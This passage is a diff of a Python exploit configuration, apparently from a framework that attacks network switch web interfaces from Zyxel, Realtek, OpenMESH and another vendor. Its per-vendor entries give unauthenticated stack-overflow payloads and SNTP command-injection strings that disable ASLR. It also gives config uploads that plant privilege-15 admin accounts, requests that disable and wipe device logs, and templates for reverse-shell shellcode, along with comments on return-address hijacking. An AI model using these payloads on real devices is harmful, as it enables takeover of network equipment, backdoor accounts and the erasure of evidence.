+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'1',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						#'encryption':'nopassword',
+						#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_time',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_time',
+						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
+						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_time',
+						'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
+						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
+						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
+
+						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Zyxel': {
+				'vendor': 'Zyxel Communications Corp.',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'encode',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': False,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=4353',
+						'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_4364=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'dispatcher.cgi': { # 'username' also suffer from heap overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						#'encryption':'nopassword',
+						#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					},
+
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {	# Not vulnerable 
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_del_account': {
+						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':False,						# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&_del=0',	# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'&_del=1',		# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
+
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
+						'sys_timeSntp_set_check':'',
+
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
+
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&STARTUP_BACKUP=1',
+						'workaround':False,	# My LAB workaround
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Realtek': {
+				'vendor': 'Realtek',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=5121',
+						'status':'',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_5132=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'md5',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
+						'sys_ping_post_check':'',
+						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
+						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
+
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
+
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
+						'workaround':True,	# My LAB workaround
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'OpenMESH': { 
+				'vendor': 'Open Mesh, Inc.',
+				'modulus_uri':'',
+				'info_leak':True,
+				'info_leak_JSON':False,
+				'info_leak_uri':'/loginMsg.js',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'',
+						'disable_query':'',
+						'status':'',
+						'clean_logfile_uri':'',
+						'clean_logfile_query':'',
+						'clean_logmem_uri':'',
+						'clean_logmem_query':'',
+						'vulnerable': False,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'security.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/security.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(280),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'datajson.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/datajson.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(288),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'',
+						'content':'',
+						'add_uri':'',
+						'del_query':'',
+						'del_uri':'',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,	# <================================
+						'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
+						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
+						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
+						'delete_query':'{"":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True, # It is vulnerable, but I am not using this authenticated code here :>
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					# Bonus: Disable and clean logs
+					#
+					#
+					'stack_cgi_add_account': {
+						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_del_account': {
+						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+						'verify_uri':'/conf_tmp/check',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
+						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
+
+						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/conf_tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# Used for both 'heap' and 'stack'
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/security.cgi?login',
+						'logout_uri':'/cgi-bin/security.cgi?logout',
+						'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						'stack':False, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Xhome': {
+				'vendor': 'Xhome',
+				'modulus_uri':'',
+				'info_leak':False,
